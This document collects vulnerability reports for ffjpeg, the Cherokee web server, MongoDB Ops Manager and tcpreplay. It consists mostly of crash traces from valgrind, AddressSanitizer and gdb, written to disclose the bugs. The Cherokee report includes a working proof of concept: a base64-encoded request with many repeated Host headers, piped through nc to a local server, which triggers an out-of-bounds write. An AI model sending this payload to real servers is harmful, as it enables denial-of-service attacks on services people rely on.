    Stopped reason: SIGSEGV
    0x000000000040bb00 in jfif_decode (ctxt=ctxt@entry=0x622010, pb=pb@entry=0x7fffffffd840) at jfif.c:546
    546	            yuv_to_rgb(*ysrc, *vsrc, *usrc, bdst + 2, bdst + 1, bdst + 0);
    gdb-peda$ bt
    #0  0x000000000040bb00 in jfif_decode (ctxt=ctxt@entry=0x622010, pb=pb@entry=0x7fffffffd840) at jfif.c:546
    #1  0x0000000000400e3b in main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffd948) at ffjpeg.c:24
    #2  0x00007ffff7a2d830 in __libc_start_main (main=0x400be0 <main>, argc=0x3, argv=0x7fffffffd948, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffd938)
        at ../csu/libc-start.c:291
    #3  0x0000000000401019 in _start ()
    

An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service (DoS).

CVE-2020-13439: heap-buffer-overflow in function jfif_decode at jfif.c:546 · Issue #24 · rockcarry/ffjpeg

ffjpeg through 2020-02-24 has an invalid write in bmp_load in bmp.c.

Tested in Ubuntu 16.04, 64bit.

I use **valgrind** to analysis the bug and get the below information (absolute path information omitted):

    ==15595== Memcheck, a memory error detector
    ==15595== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
    ==15595== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
    ==15595== Command: ffjpeg -e segv_ffjpeg_e
    ==15595== 
    ==15595== Invalid write of size 1
    ==15595==    at 0x4C35035: __GI_mempcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==15595==    by 0x4EB303D: _IO_file_xsgetn (fileops.c:1392)
    ==15595==    by 0x4EA8235: fread (iofread.c:38)
    ==15595==    by 0x4016D9: fread (stdio2.h:295)
    ==15595==    by 0x4016D9: bmp_load (bmp.c:57)
    ==15595==    by 0x400F2B: main (ffjpeg.c:29)
    ==15595==  Address 0x852060cf is not stack'd, malloc'd or (recently) free'd
    ==15595== 
    ==15595== 
    ==15595== Process terminating with default action of signal 11 (SIGSEGV)
    ==15595==  Access not within mapped region at address 0x852060CF
    ==15595==    at 0x4C35035: __GI_mempcpy (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==15595==    by 0x4EB303D: _IO_file_xsgetn (fileops.c:1392)
    ==15595==    by 0x4EA8235: fread (iofread.c:38)
    ==15595==    by 0x4016D9: fread (stdio2.h:295)
    ==15595==    by 0x4016D9: bmp_load (bmp.c:57)
    ==15595==    by 0x400F2B: main (ffjpeg.c:29)
    ==15595==  If you believe this happened as a result of a stack
    ==15595==  overflow in your program's main thread (unlikely but
    ==15595==  possible), you can try to increase the size of the
    ==15595==  main thread stack using the --main-stacksize= flag.
    ==15595==  The main thread stack size used in this run was 8388608.
    ==15595== 
    ==15595== HEAP SUMMARY:
    ==15595==     in use at exit: 3,624 bytes in 2 blocks
    ==15595==   total heap usage: 3 allocs, 1 frees, 7,720 bytes allocated
    ==15595== 
    ==15595== LEAK SUMMARY:
    ==15595==    definitely lost: 0 bytes in 0 blocks
    ==15595==    indirectly lost: 0 bytes in 0 blocks
    ==15595==      possibly lost: 0 bytes in 0 blocks
    ==15595==    still reachable: 3,624 bytes in 2 blocks
    ==15595==         suppressed: 0 bytes in 0 blocks
    ==15595== Rerun with --leak-check=full to see details of leaked memory
    ==15595== 
    ==15595== For counts of detected and suppressed errors, rerun with: -v
    ==15595== ERROR SUMMARY: 1 errors from 1 contexts (suppressed: 0 from 0)
    Segmentation fault
    

I use **AddressSanitizer** to build ffjpeg and running it with the following command:

    ASAN:SIGSEGV
    =================================================================
    ==16256==ERROR: AddressSanitizer: SEGV on unknown address 0x61f08000fa20 (pc 0x7fdcba5a8443 bp 0x000000000240 sp 0x7ffe28f759f8 T0)
        #0 0x7fdcba5a8442  (/lib/x86_64-linux-gnu/libc.so.6+0x8f442)
        #1 0x7fdcba59203d  (/lib/x86_64-linux-gnu/libc.so.6+0x7903d)
        #2 0x7fdcba587235 in _IO_fread (/lib/x86_64-linux-gnu/libc.so.6+0x6e235)
        #3 0x401670 in bmp_load ffjpeg/src/bmp.c:57
        #4 0x401294 in main (ffjpeg/src/ffjpeg+0x401294)
        #5 0x7fdcba53982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #6 0x4010c8 in _start (ffjpeg/src/ffjpeg+0x4010c8)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV ??:0 ??
    ==16256==ABORTING
    

An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service (DoS).

CVE-2020-13440: SEGV in function bmp_load at bmp.c:57 · Issue #22 · rockcarry/ffjpeg

In Cherokee through 1.2.104, remote attackers can trigger an out-of-bounds write in cherokee_handler_cgi_add_env_pair in handler_cgi.c by sending many request headers, as demonstrated by a GET request with many "Host: 127.0.0.1" headers.

struct cherokee\_handler\_cgi\_t (handler\_cgi.h) consist of a fixed sized array (char \*envp\[ENV\_VAR\_NUM\]) for environ variables. Sending a request with a lot of headers, causes to

increment int envp\_last to a value greater than ENV\_VAR\_NUM resulting in reading outside the array.

handler\_cgi.c:

    310     cgi->envp[cgi->envp_last] = entry;
    311     cgi->envp_last++;
    

**PoC**

    echo -n 'R0VUIC90ZXN0MTAvdGVzdC5odG1sIEhUVFAvMS4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMTcwMTQxMTgzNDYwNDY5MjMxNzMxNjg3MzAzNzE1ODg0MTA1NzI3Ckhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDQyOTQ5NjcyOTUuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpIb3N0OiAxMjcuMC4wLjEKSG9zdDogMTI3LjAuMC4xCkhvc3Q6IDEyNy4wLjAuMQpVc2VyLUFnZW50OiBweXRob24KCgo=' | base64 -d | nc 127.0.0.1 80
    

**ASAN**

    =================================================================
    ==10864==ERROR: AddressSanitizer: SEGV on unknown address 0x6180001cb3c0 (pc 0x55c74bfd2f94 bp 0x7f6bac2e6220 sp 0x7f6bac2e61f0 T7)
    ==10864==The signal is caused by a WRITE memory access.
        #0 0x55c74bfd2f93 in cherokee_handler_cgi_add_env_pair /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310
        #1 0x55c74c02d6e4 in foreach_header_add_unknown_variable /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:664
        #2 0x55c74c09fe32 in cherokee_header_foreach_unknown /home/mmm/fuzz/webserver/cherokee/header.c:1220
        #3 0x55c74c02db36 in cherokee_handler_cgi_base_build_envp /home/mmm/fuzz/webserver/cherokee/handler_cgi_base.c:696
        #4 0x55c74bfd30f3 in add_environment /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:328
        #5 0x55c74bfd6912 in fork_and_execute_cgi_via_spawner /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:787
        #6 0x55c74bfd35a8 in cherokee_handler_cgi_init /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:382
        #7 0x55c74c04b44c in cherokee_handler_init /home/mmm/fuzz/webserver/cherokee/handler.c:93
        #8 0x55c74c048233 in cherokee_connection_open_request /home/mmm/fuzz/webserver/cherokee/connection.c:2678
        #9 0x55c74bf84889 in process_active_connections /home/mmm/fuzz/webserver/cherokee/thread.c:1165
        #10 0x55c74bf8a549 in cherokee_thread_step_MULTI_THREAD /home/mmm/fuzz/webserver/cherokee/thread.c:2086
        #11 0x55c74bf7e300 in thread_routine /home/mmm/fuzz/webserver/cherokee/thread.c:99
        #12 0x7f6bb2b166da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
        #13 0x7f6bb263b88e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12188e)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV /home/mmm/fuzz/webserver/cherokee/handler_cgi.c:310 in cherokee_handler_cgi_add_env_pair
    Thread T7 created by T0 here:
        #0 0x7f6bb2f9dd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
        #1 0x55c74bf7f219 in cherokee_thread_new /home/mmm/fuzz/webserver/cherokee/thread.c:247
        #2 0x55c74bf6773f in initialize_server_threads /home/mmm/fuzz/webserver/cherokee/server.c:671
        #3 0x55c74bf69a05 in cherokee_server_initialize /home/mmm/fuzz/webserver/cherokee/server.c:1053
        #4 0x55c74bf0d76f in common_server_initialization /home/mmm/fuzz/webserver/cherokee/main_worker.c:255
        #5 0x55c74bf0e1f7 in main /home/mmm/fuzz/webserver/cherokee/main_worker.c:393
        #6 0x7f6bb253bb96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
    
    ==10864==ABORTING
    
    

**Setup:**

*   Ubuntu 18.04 64 bit
    
*   source code from github, commit 9a75e65
    
*   build command:
    

    ac_cv_func_realloc_0_nonnull=yes ac_cv_func_malloc_0_nonnull=yes LDFLAGS="-lasan" LDADD="-lasan" CFLAGS="-fsanitize=address -ggdb -O0 -fprofile-arcs -ftest-coverage" ./configure --prefix=`pwd`/bin --enable-trace --enable-static-module=all --enable-static --enable-shared=no
    make
    

*   files in webroot mkdir /var/www/test{1..20}; for i in seq 1 20; do echo test > test$i/test.html; done
*   configuration file cherokee.txt

found by: Mateusz Kocielski, Michał Dardas from LogicalTrust

CVE-2019-20800: CGI Handler too many headers · Issue #1224 · cherokee/webserver

In affected Ops Manager versions there is an exposed http route was that may allow attackers to view a specific access log of a publicly exposed Ops Manager instance. This issue affects: MongoDB Inc. MongoDB Ops Manager 4.0 versions 4.0.9, 4.0.10 and MongoDB Ops Manager 4.1 version 4.1.5.



CVE-2019-2388: Ops Manager Server Changelog — MongoDB Ops Manager 6.0

tcprewrite in Tcpreplay through 4.3.2 has a heap-based buffer over-read during a get_c operation. The issue is being triggered in the function get_ipv6_next() at common/get.c.

**Describe the bug**  
A heap-based buffer overflow was discovered in tcprewrite binary, during the get\_c operation. The issue is being triggered in the function get\_ipv6\_next() at common/get.c.

**To Reproduce**  
Steps to reproduce the behavior:

1.  Compile tcpreplay according to the default configuration
2.  execute command

tcprewrite -i $poc -o /dev/null --fuzz-seed=42

poc can be found here.

**Expected behavior**  
An attacker can exploit this vulnerability by submitting a malicious pcap that exploits this issue. This will result in a Denial of Service (DoS) and potentially Information Exposure when the application attempts to process the file.

**Screenshots**  
ASAN Reports

/usr/local/bin/tcprewrite -i id\\:000000\\,sig\\:11\\,src\\:000280\\,op\\:fa-havoc\\,rep\\:2 -o /dev/null --fuzz-seed=42
=================================================================
==34195==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63100001080e at pc 0x00000042bd74 bp 0x7ffd8b9eada0 sp 0x7ffd8b9ead90
READ of size 4 at 0x63100001080e thread T0
    #0 0x42bd73 in get\_ipv6\_next /home/test/Desktop/evaulation/tcpreplay/src/common/get.c:454
    #1 0x42bfcc in get\_ipv6\_l4proto /home/test/Desktop/evaulation/tcpreplay/src/common/get.c:540
    #2 0x42bfb9 in get\_ipv6\_l4proto /home/test/Desktop/evaulation/tcpreplay/src/common/get.c:531
    #3 0x4134c2 in do\_checksum /home/test/Desktop/evaulation/tcpreplay/src/tcpedit/checksum.c:63
    #4 0x40b383 in fix\_ipv4\_checksums /home/test/Desktop/evaulation/tcpreplay/src/tcpedit/edit\_packet.c:74
    #5 0x4079c2 in tcpedit\_packet /home/test/Desktop/evaulation/tcpreplay/src/tcpedit/tcpedit.c:354
    #6 0x40569b in rewrite\_packets /home/test/Desktop/evaulation/tcpreplay/src/tcprewrite.c:291
    #7 0x404e13 in main /home/test/Desktop/evaulation/tcpreplay/src/tcprewrite.c:130
    #8 0x7f9fd6a0e82f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #9 0x402688 in \_start (/usr/local/bin/tcprewrite+0x402688)

0x63100001080e is located 1 bytes to the right of 65549-byte region \[0x631000000800,0x63100001080d)
allocated by thread T0 here:
    #0 0x7f9fd72b2602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42c8e9 in \_our\_safe\_malloc /home/test/Desktop/evaulation/tcpreplay/src/common/utils.c:50
    #2 0x40551e in rewrite\_packets /home/test/Desktop/evaulation/tcpreplay/src/tcprewrite.c:249
    #3 0x404e13 in main /home/test/Desktop/evaulation/tcpreplay/src/tcprewrite.c:130
    #4 0x7f9fd6a0e82f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow /home/test/Desktop/evaulation/tcpreplay/src/common/get.c:454 get\_ipv6\_next
Shadow bytes around the buggy address:
  0x0c627fffa0b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffa0c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffa0d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffa0e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c627fffa0f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
\=>0x0c627fffa100: 00\[05\]fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c627fffa150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
\==34195\==ABORTING

Debug

Program received signal SIGSEGV, Segmentation fault.
0x0000000000410025 in get\_ipv6\_next (exthdr=0x663ff6, len=0x8) at get.c:454
454        maxlen = \*((int\*)((u\_char \*)exthdr + len));
\[ Legend: Modified register | Code | Heap | Stack | String \]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0000000000663ff6  →  0x0000000000000000
$rbx   : 0x0               
$rcx   : 0x10080a0000000001
$rdx   : 0x1               
$rsp   : 0x00007fffffffd8a8  →  0x0000000000410207  →  <get\_ipv6\_l4proto+87> test rax, rax
$rbp   : 0x8               
$rsi   : 0x8               
$rdi   : 0x0000000000663ff6  →  0x0000000000000000
$rip   : 0x0000000000410025  →  <get\_ipv6\_next+37> mov esi, DWORD PTR \[rdi+rsi\*1\]
$r8    : 0xe               
$r9    : 0x34              
$r10   : 0x8               
$r11   : 0x1               
$r12   : 0x1008080000000001
$r13   : 0x1               
$r14   : 0x20000000000     
$r15   : 0x1               
$eflags: \[CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow RESUME virtualx86 identification\]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000 
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007fffffffd8a8│+0x0000: 0x0000000000410207  →  <get\_ipv6\_l4proto+87> test rax, rax     ← $rsp
0x00007fffffffd8b0│+0x0008: 0x0000000000633c4e  →  0x29294fab8000a062 ("b"?)
0x00007fffffffd8b8│+0x0010: 0x0000000000631550  →  0x0000000000000001
0x00007fffffffd8c0│+0x0018: 0x0000000000631550  →  0x0000000000000001
0x00007fffffffd8c8│+0x0020: 0x000000000000000e
0x00007fffffffd8d0│+0x0028: 0x0000000000631550  →  0x0000000000000001
0x00007fffffffd8d8│+0x0030: 0x0000000000406d56  →  <do\_checksum+438> mov ecx, DWORD PTR \[rsp+0xc\]
0x00007fffffffd8e0│+0x0038: 0x0000000000631e10  →  0x0000000000631550  →  0x0000000000000001
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
     0x410014 <get\_ipv6\_next+20> add    BYTE PTR \[rax+0x63\], cl
     0x410017 <get\_ipv6\_next+23> test   BYTE PTR \[rax-0x2d\], 0xe2
     0x41001b <get\_ipv6\_next+27> movabs rcx, 0x10080a0000000001
 →   0x410025 <get\_ipv6\_next+37> mov    esi, DWORD PTR \[rdi+rsi\*1\]
     0x410028 <get\_ipv6\_next+40> test   rdx, rcx
     0x41002b <get\_ipv6\_next+43> jne    0x410050 <get\_ipv6\_next+80>
     0x41002d <get\_ipv6\_next+45> movabs rcx, 0x804000000000000
     0x410037 <get\_ipv6\_next+55> and    rcx, rdx
     0x41003a <get\_ipv6\_next+58> jne    0x410080 <get\_ipv6\_next+128>
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── source:get.c+454 ────
    449         int extlen = 0;
    450         int maxlen;
    451         void \*ptr;
    452         assert(exthdr);
    453     
 →  454         maxlen = \*((int\*)((u\_char \*)exthdr + len));
    455     
    456         dbgx(3, "Jumping to next IPv6 header.  Processing 0x%02x", exthdr-\>ip\_nh);
    457         switch (exthdr-\>ip\_nh) {
    458         /\* no further processing \*/
    459         case TCPR\_IPV6\_NH\_NO\_NEXT:
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
\[#0\] Id 1, Name: "tcprewrite", stopped, reason: SIGSEGV
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
\[#0\] 0x410025 → get\_ipv6\_next(exthdr=0x663ff6, len=0x8)
\[#1\] 0x410207 → get\_ipv6\_l4proto(ip6\_hdr=0x633c4e, len=<optimized out>)
\[#2\] 0x406d56 → do\_checksum(tcpedit=0x631550, data=0x633c4e "b\\240", proto=0x0, len=0x80)
\[#3\] 0x404988 → fix\_ipv4\_checksums(tcpedit=0x631550, pkthdr=<optimized out>, ip\_hdr=0x633c4e)
\[#4\] 0x403407 → tcpedit\_packet(tcpedit=0x631550, pkthdr=0x7fffffffd9b8, pktdata=0x61fc78 <pktdata\_buff>, direction=TCPR\_DIR\_C2S)
\[#5\] 0x402d06 → rewrite\_packets(tcpedit=0x631550, pin=0x621290, pout=0x632a00)
\[#6\] 0x402151 → main(argc=<optimized out>, argv=<optimized out>)

**System (please complete the following information):**

*   OS version : Ubuntu 16.04
*   Tcpreplay Version : 4.3.2/master branch

Tag

#ubuntu